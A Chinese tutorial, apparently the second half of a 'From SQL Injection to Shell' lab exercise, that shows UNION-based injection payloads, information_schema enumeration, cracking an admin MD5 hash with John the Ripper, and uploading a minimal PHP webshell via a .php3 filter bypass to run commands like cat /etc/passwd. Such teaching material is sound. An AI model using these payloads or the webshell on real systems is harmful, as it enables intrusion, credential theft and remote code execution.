从SQL注入到脚本(下)

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
云数据库 RDS MySQL,高可用系列 2核4GB
简介: 从SQL注入到脚本(下)

UNION关键字

UNION语句用于汇集来自两个请求的信息:

SELECT * FROM articles WHERE id=3 UNION SELECT ...

由于它用于从其他表检索信息,因此可以将其用作SQL注入负载。攻击者无法直接修改查询的开头,因为它是由PHP代码生成的。但是,通过使用UNION,攻击者可以操纵查询结束并从其他表检索信息:


SELECT id,name,price FROM articles WHERE id=3 UNION SELECT id,login,password FROM users

最重要的规则是,两条语句都应返回相同的列数,否则数据库将触发错误。

使用UNION开发SQL注入

使用UNION开发SQL注入的步骤如下:

  1. 查找要执行并集的列数
  2. 查找页面中回显的列
  3. 从数据库元表中检索信息
  4. 从其他表/数据库检索信息

为了通过SQL注入执行请求,需要找到查询第一部分返回的列数。除非你有应用程序的源代码,否则你必须猜测这个数字。

有两种方法可以获取此信息:

  • 使用UNION SELECT并增加列数;
  • 使用ORDER BY语句。

如果尝试进行联合,并且两个查询返回的列数不同,则数据库将抛出错误:


The used SELECT statements have a different number of columns


可以使用此属性猜测列数。例如,如果可以插入以下查询:


SELECT id,name,price FROM articles where id=1.


您将尝试以下步骤:

  • SELECT id,name,price FROM articles where id=1 UNION SELECT 1,

注入1 UNION SELECT 1将返回错误,因为查询的两个子部分中的列数不同;

  • SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,

出于与上述相同的原因,有效负载1 UNION SELECT 1,2将返回错误;SELECTid,name,price FROM articles where id=1 UNION SELECT 1,2,3,

因为两个子部分的列数相同,所以此查询不会引发错误。您甚至可以在页面或页面源代码中看到其中一个数字。


注意:这适用于MySQL。其他数据库的方法不同,值为1、2、3,应更改为null、null、null对于在UNION关键字的两侧需要相同类型值的数据库。对于Oracle,当使用SELECT时,需要使用关键字FROM,可以使用dual表来完成请求:


UNION SELECT null、null、null FROM dual


另一个方法使用关键字ORDER BY。ORDER BY主要用于告诉数据库应该使用哪个列对结果进行排序:


SELECT firstname,lastname,age,groups FROM users ORDER BY firstname


上面的请求将返回按firstname列排序的用户。

ORDER BY还可以用于与整数一起使用,以告知数据库按列号X排序:


SELECT firstname,lastname,age,groups FROM users ORDER BY 3


上面的请求将返回按第三列排序的用户。

此功能可用于检测列数,如果ORDER BY语句中的列数大于查询中的列数,则会引发错误(例如10):


Unknown column '10' in 'order clause'


可以使用此属性猜测列数。例如,如果可以插入以下查询:SELECT id,name,price FROM articles where id=1;

您可以尝试以下步骤:

  • SELECT id,name,price FROM articles where id=1 ORDER BY 5注入1 ORDER BY 5将返回错误,因为查询的第一部分中的列数小于5;
  • SELECT id,name,price FROM articles where id=1 ORDER BY 3注入1 ORDER BY 3不会返回错误,因为查询的第一部分中的列数小于或等于3;
  • SELECT id,name,price FROM articles where id=1 ORDER BY 4注入ORDER BY 4将返回错误,因为查询的第一部分中的列数小于4;

基于这种二分法搜索,我们知道列数为3,现在可以使用此信息构建最终查询:SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3即使此方法为本例提供了相同数量的请求,但只要列数增加,它的速度就会显著加快。


正在检索信息

现在我们知道了列的数量,可以从数据库中检索信息了。根据我们收到的错误消息,我们知道使用的后端数据库是MySQL。

使用此信息,我们可以强制数据库执行功能或向我们发送信息:

PHP应用程序使用current_user()连接到数据库的用户

使用version()的数据库版本

为了执行此操作,我们需要将前面语句(UNION SELECT 1,2,3)中的一个值替换为要运行的函数,以便在响应中检索结果。


在尝试检索信息时,请确保始终保持正确的列数。


例如,您可以访问以下URL来检索此信息:

  • 数据库版本:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,@@version,3,4
  • 当前用户:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,current_user(),3,4
  • 当前数据库:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,database(),3,4


我们现在可以从数据库中检索信息并检索任意内容。为了检索与当前应用程序相关的信息,我们需要:

  • 当前数据库中所有表的名称
  • 要从中检索信息的表的列名称

MySQL提供的表包含自MySQL版本5以来可用的数据库、表和列的元信息。我们将使用这些表来检索构建最终请求所需的信息。这些表存储在information_schema中。

以下查询可用于检索:

  • 所有表的列表:SELECT table_name FROM information_schema.table;
  • 所有列的列表:SELECT column_name FROM information_schema.columns;

通过混合使用这些查询和以前的URL,您可以猜测要访问哪个页面来检索信息:

表格列表:1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables

列列表:1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns

问题是这些请求为您提供了所有表和列的原始列表,但要查询数据库并检索有趣的信息,您需要知道哪些列属于哪个表。希望是表information_schema.columns。列存储表名:


SELECT table_name,column_name FROM information_schema.columns


要检索此信息,我们可以

将tablename和columnname放在注入的不同部分:1 UNION SELECT1, table_name, column_name,4FROM information_schema.columns

使用关键字CONCAT:1 UNION SELECT1,concat(table_name,':', column_name),3,4FROM information_schema.columns. ':'

将tablename和columnname连接在注入的同一部分中,以便能够轻松拆分查询结果。


如果要使用正则表达式轻松地从结果页检索信息(例如,如果要编写SQL注入脚本),可以在注入中使用标记:``1 UNION SELECT 1,concat('^^^',table_name,':',column_name,'^^^') FROM information_schema.columns`。然后很容易在页面中匹配结果。

SQL注入提供了与应用程序用于连接到数据库的用户(current_user())...相同的访问级别这就是为什么在部署web应用程序时,为该用户提供尽可能最低的权限总是很重要的原因。

访问管理页面和代码执行破解密码


可以使用两种不同的方法轻松破解密码:

当一个散列是不加盐的,它可以很容易地用谷歌这样的搜索引擎破解。为此,只需搜索哈希,您就会看到许多网站上都有您密码的明文版本:


image.png


John The Ripper可用于破解此密码,大多数现代Linux发行版都包含John的一个版本,为了破解此密码,您需要告诉John使用了什么算法对其进行加密。对于web应用程序,一个很好的猜测是MD5。


在大多数Linux发行版中,John the Ripper提供的版本只支持少量格式。您可以不带任何参数运行john,从使用信息中获取受支持格式的列表。例如,在Fedora上,支持以下格式:


$ john
# ...usage information...
--format=NAME  force hash type NAME: DES/BSDI/MD5/BF/AFS/LM/crypt
# ...usage information...


遗憾的是,可用的MD5不是PHP函数MD5创建的格式。为了破解此密码,我们需要一个支持raw-md5的John版本。主网站上提供的社区增强版支持raw-md5,可以使用。


现在,我们需要以正确的格式为John提供信息,我们需要将用户名和密码放在同一行上,并用冒号 ':'分隔。


admin:8efe310f9ab3efeae8d410a8e0166eb2


可以使用以下命令行破解以前检索到的密码:


$ ./john password --format=raw-md5  --wordlist=dico --rules


使用以下选项:

  • password告诉john哪个文件包含密码哈希
  • --format=raw-md5告诉john密码哈希是raw-md5格式
  • --wordlist=dico告诉john将dico文件用作字典
  • --rules告诉john为提供的每个单词尝试变体

John输出与所用格式匹配的哈希数:


Loaded 1 password hash (Raw MD5 [SSE2 16x4x2 (intr)])


这表明使用了正确的格式。

您可以快速检索密码:

$ ./john password --format=raw-md5  --wordlist=dico --rules
Loaded 1 password hash (Raw MD5 [SSE2 16x4x2 (intr)])
P4ssw0rd         (admin)


上载Webshell和代码执行

一旦获得对管理页面的访问权限,下一个目标就是找到在操作系统上执行命令的方法。


我们可以看到,有一个文件上传功能允许用户上传图片,我们可以使用此功能尝试上传PHP脚本。这个PHP脚本一旦上传到服务器上,将为我们提供一种运行PHP代码和命令的方法。


首先,我们需要创建一个PHP脚本来运行命令。下面是一个简单且最小的webshell的源代码:


<?
  system($_GET['cmd']);
?>


此脚本获取参数cmd的内容并执行它。它需要保存为扩展名为的file.php,例如:shell.php可用作文件名。

我们现在可以使用页面上提供的上载功能:http://vulnerable/admin/new.php并尝试上载此脚本。

我们可以看到,脚本没有正确上传到服务器上。应用程序阻止扩展名为的文件。要上载的php。但是,我们可以尝试:

.php3将绕过一个简单的过滤器.php

.php。将绕过简单过滤器的测试.php和Apache仍将使用.php,因为在此配置中,它没有用于的处理程序.test

现在,我们需要找到管理上传的PHP脚本将文件放在web服务器上的位置。我们需要确保该文件可直接用于web客户端。我们可以访问新上传图像的网页,查看<img标记指向的位置:< span=""></img标记指向的位置:<>


<divclass="content">
        <h2>Lastpicture: Test shell</h2>
        <divalign="center">
          <p>
            <img src="admin/uploads/shell.php3"alt="Test shell" /> </p>
        </div>
     </div>


现在,您可以访问以下地址的页面,并开始使用cmd参数运行命令。例如,访问http://vulnerable/admin/uploads/shell.php3?cmd=uname将在操作系统上运行uname命令并返回当前内核(Linux)。

其他命令可用于检索更多信息:

  • cat/etc/passwd获取系统用户的完整列表;
  • uname -a获取当前内核的版本;
  • ls获取当前目录的内容;


webshell与运行PHP脚本的web服务器具有相同的权限,例如,您将无法检索文件/etc/shadow的内容,因为web服务器无权访问此文件(但是,您仍应尝试,以防管理员出错并更改了此文件的权限)。


每个命令都独立于前一个命令在全新的上下文中运行,您将无法通过运行/etc/shadow和ls来获取/etc/目录的内容.


结论


本练习向您展示了如何手动检测和利用SQL注入来访问管理页面。一旦进入“受信任区域”,通常会有更多的功能可用,这可能会导致更多的漏洞。


此练习基于几年前在一个网站上进行的渗透测试的结果,但具有此类漏洞的网站今天仍然可以在互联网上找到。


所提供的web服务器的配置是一种理想的情况,因为会显示错误消息,并且关闭PHP保护。我们将在另一个练习中看到如何在更困难的条件下利用SQL注入,但与此同时,您可以使用PHP配置来强化练习。为此,您需要启用magic_quotes_gpc并禁用PHP配置中的display_errors错误(/etc/php5/apache2/php.ini),然后重新启动web服务器(/etc/init.d/apache2 restart)

相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
1月前
|
SQL 关系型数据库 MySQL
|
18天前
|
SQL 关系型数据库 MySQL
mysql编写sql脚本:要求表没有主键,但是想查询没有相同值的时候才进行插入
mysql编写sql脚本:要求表没有主键,但是想查询没有相同值的时候才进行插入
30 0
|
2月前
|
SQL 安全 数据库
惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
128 5
|
2月前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,却也面临着SQL注入、XSS与CSRF等安全威胁。本文将剖析这些常见攻击手段,并提供示例代码,展示如何利用参数化查询、HTML转义及CSRF令牌等技术构建坚固防线,确保Python Web应用的安全性。安全之路永无止境,唯有不断改进方能应对挑战。
67 5
|
2月前
|
SQL 安全 数据安全/隐私保护
Python Web安全大挑战:面对SQL注入、XSS、CSRF,你准备好了吗?
在构建Python Web应用时,安全性至关重要。本文通过三个真实案例,探讨了如何防范SQL注入、XSS和CSRF攻击。首先,通过参数化查询替代字符串拼接,防止SQL注入;其次,利用HTML转义机制,避免XSS攻击;最后,采用CSRF令牌验证,保护用户免受CSRF攻击。这些策略能显著增强应用的安全性,帮助开发者应对复杂的网络威胁。安全是一个持续的过程,需不断学习新知识以抵御不断变化的威胁。
115 1
|
2月前
|
SQL 安全 数据库
Python Web开发者必看!SQL注入、XSS、CSRF全面解析,守护你的网站安全!
在Python Web开发中,构建安全应用至关重要。本文通过问答形式,详细解析了三种常见Web安全威胁——SQL注入、XSS和CSRF,并提供了实用的防御策略及示例代码。针对SQL注入,建议使用参数化查询;对于XSS,需对输出进行HTML编码;而防范CSRF,则应利用CSRF令牌。通过这些措施,帮助开发者有效提升应用安全性,确保网站稳定运行。
47 1
|
2月前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,但安全挑战不容小觑。本文剖析Python Web应用中的三大安全威胁:SQL注入、XSS及CSRF,并提供防御策略。通过示例代码展示如何利用参数化查询、HTML转义与CSRF令牌构建安全防线,助您打造更安全的应用。安全是一场持久战,需不断改进优化。
46 3
|
2月前
|
SQL 安全 数据库
从入门到精通:Python Web安全守护指南,SQL注入、XSS、CSRF全防御!
【9月更文挑战第13天】在开发Python Web应用时,安全性至关重要。本文通过问答形式,详细介绍如何防范SQL注入、XSS及CSRF等常见威胁。通过使用参数化查询、HTML转义和CSRF令牌等技术,确保应用安全。附带示例代码,帮助读者从入门到精通Python Web安全。
86 6
|
2月前
|
SQL 安全 JavaScript
告别Web安全小白!Python实战指南:抵御SQL注入、XSS、CSRF的秘密武器!
【9月更文挑战第12天】在Web开发中,安全漏洞如同暗礁,尤其对初学者而言,SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)是常见挑战。本文通过实战案例,展示如何利用Python应对这些威胁。首先,通过参数化查询防止SQL注入;其次,借助Jinja2模板引擎自动转义机制抵御XSS攻击;最后,使用Flask-WTF库生成和验证CSRF令牌,确保转账功能安全。掌握这些技巧,助你构建更安全的Web应用。
50 5
|
3月前
|
存储 SQL Go
全网最长的sql server巡检脚本分享(1000行)
全网最长的sql server巡检脚本分享(1000行)
52 1